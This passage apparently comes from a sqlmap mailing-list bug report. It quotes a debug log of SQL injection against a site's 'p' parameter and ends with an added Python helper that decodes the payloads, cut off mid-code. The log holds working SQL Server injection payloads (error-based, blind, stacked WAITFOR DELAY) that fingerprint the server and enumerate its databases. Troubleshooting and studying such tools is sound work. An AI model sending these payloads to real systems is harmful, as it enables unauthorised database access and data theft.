> > [09:55:40] [PAYLOAD] -2422' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'hiSw'='hiSw
> > [09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'FIBp'='FIBp
> > [09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided
> > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30 columns' because the level is higher than the provided
> > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided
> > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided
> > [09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep testing the others?
[y/N] N > > [09:55:43] [DEBUG] used the default behaviour, running in batch mode > > sqlmap identified the following injection points with a total of 30 > HTTP(s) > > requests: > > --- > > Place: GET > > Parameter: p > > Type: boolean-based blind > > Title: AND boolean-based blind - WHERE or HAVING clause > > Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa > > > > Type: error-based > > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > > clause > > Payload: p=20111' AND > > 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl > > > > Type: stacked queries > > Title: Microsoft SQL Server/Sybase stacked queries > > Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > > > > Type: AND/OR time-based blind > > Title: Microsoft SQL Server/Sybase time-based blind > > Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > > --- > > > > [09:55:43] [INFO] testing Microsoft SQL Server > > [09:55:43] [PAYLOAD] 20111' AND > > 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE > > CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND > > 'XHDB'='XHDB > > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:44] [INFO] retrieved: 1 > > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > > [09:55:44] [INFO] confirming Microsoft SQL Server > > [09:55:44] [PAYLOAD] 20111' AND > > 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH > > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:44] [INFO] retrieved: 1 > > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > > 
[09:55:44] [PAYLOAD] 20111' AND > > 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM > > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:44] [INFO] retrieved: 1 > > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > > [09:55:44] [PAYLOAD] 20111' AND > > 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT > > [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:45] [INFO] retrieved: 1 > > [09:55:45] [DEBUG] performed 1 queries in 0 seconds > > [09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server > > web server operating system: Windows Vista > > web application technology: ASP.NET, Microsoft IIS 7.0 > > back-end DBMS: Microsoft SQL Server 2008 > > [09:55:45] [INFO] fetching database names > > [09:55:45] [PAYLOAD] 20111' AND > > 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND > > 'IIWR'='IIWR > > [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:45] [INFO] the SQL query used returns 37 entries > > [09:55:45] [PAYLOAD] 20111' AND > > 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh > > [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:46] [PAYLOAD] 20111' 
AND > > 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn > > [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:46] [PAYLOAD] 20111' AND > > 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn > > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:47] [PAYLOAD] 20111' AND > > 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl > > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:47] [PAYLOAD] 20111' AND > > 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC > > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:48] [PAYLOAD] 20111' AND > > 5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 5 
name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT > > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:48] [PAYLOAD] 20111' AND > > 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW > > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:48] [PAYLOAD] 20111' AND > > 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal 
Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN > > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:50] [PAYLOAD] 20111' AND > > 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv > > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:50] [PAYLOAD] 20111' AND > > 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn > > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:50] [PAYLOAD] 20111' AND > > 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > 
master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo > > [09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:51] [PAYLOAD] 20111' AND > > 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD > > [09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:52] [PAYLOAD] 20111' AND > > 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc > > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:53] [PAYLOAD] 20111' AND > > 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ > > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:53] [PAYLOAD] 20111' AND > > 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb > 
> [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:53] [PAYLOAD] 20111' AND > > 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt > > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:54] [PAYLOAD] 20111' AND > > 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI > > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:54] [PAYLOAD] 20111' AND > > 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ > > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:54] [PAYLOAD] 20111' AND > > 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe > > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:55] [PAYLOAD] 20111' AND > > 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 
ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT > > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:55] [PAYLOAD] 20111' AND > > 4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP > > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:55] [PAYLOAD] 20111' AND > > 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB > > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:56] [PAYLOAD] 20111' AND > > 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP > > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases > > WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY > 1 > > ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > > AND 'COwJ'='COwJ > > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:56] [PAYLOAD] 20111' AND > > 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk > > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP > > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases > > WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY > 1 > > ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > > AND 'STKX'='STKX > > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp > > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf > > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx > > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:58] [PAYLOAD] 20111' AND > > 
3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd > > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:58] [PAYLOAD] 20111' AND > > 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT > > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:00] [PAYLOAD] 20111' AND > > 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk > > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:00] [PAYLOAD] 20111' AND > > 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER > > [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:01] [PAYLOAD] 20111' AND > > 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP > > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases > > WHERE name NOT IN (SELECT TOP 36 
name FROM master..sysdatabases ORDER BY > 1 > > ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > > AND 'MPbC'='MPbC > > [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:02] [DEBUG] performed 38 queries in 16 seconds > > available databases [37]: > > > > [09:56:02] [WARNING] HTTP error codes detected during testing: > > 500 (Internal Server Error) - 62 times > > [09:56:02] [INFO] Fetched data logged to text files under > > '/path/sqlmap-dev/output/www.vuln.com' > > > > [*] shutting down at: 09:56:02 > > > > David > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- David Gomes Guimarães |
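An added triage helper for the requests quoted in this thread (example code written for this page, not sqlmap's own): it decodes the CHAR()-built strings so each payload reads as plain SQL, which exposes the ':mur:' / ':ksm:' markers sqlmap uses to bracket the value it reads back out of the conversion error, and it flags the doubled ORDER BY that David reports. The sample parameter values are constructed from the log above; the "fixed" single-ORDER BY form is an assumption about what a correct query looks like, not the r3289 change.

```python
"""Triage helper for the SQL Server error-based payloads quoted in this thread.

sqlmap builds marker strings out of CHAR() calls, wraps the value it wants to
read back between them, and forces CONVERT(INT, ...) to fail so the value
comes back inside the SQL Server error text (hence the HTTP 500 on every
extraction request in the log). This module decodes those CHAR() runs so a
request reads as SQL, and flags the doubled ORDER BY that made every query
on this page fail with "Incorrect syntax near the keyword 'ORDER'".
"""
import re

# CHAR(n) only when it is the function itself, not the tail of NVARCHAR(4000).
CHAR_CALL = re.compile(r"\bCHAR\((\d+)\)", re.IGNORECASE)
# A run of CHAR() calls joined by '+' (T-SQL string concatenation).
CHAR_RUN = re.compile(r"\bCHAR\(\d+\)(?:\+CHAR\(\d+\))*", re.IGNORECASE)
# Two ORDER BY clauses at the same nesting level, i.e. with no parenthesis
# between them. Valid T-SQL never contains this; the template on this page did.
DOUBLE_ORDER_BY = re.compile(r"\bORDER\s+BY\b[^()]*?\bORDER\s+BY\b", re.IGNORECASE)
# The ':xxx:' delimiters that bracket the extracted value once decoded.
MARKER = re.compile(r"':([A-Za-z]{3}):'")
CONVERT_INT = re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.IGNORECASE)

# Constructed samples, re-typed from the payloads in the log above. The
# "fixed" entry is an assumed correct single-ORDER BY form of the same query,
# not the actual r3289 change.
SAMPLES = {
    "boolean": "20111' AND 4255=4255 AND 'obQa'='obQa",
    "error_based": (
        "20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)"
        "+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32))"
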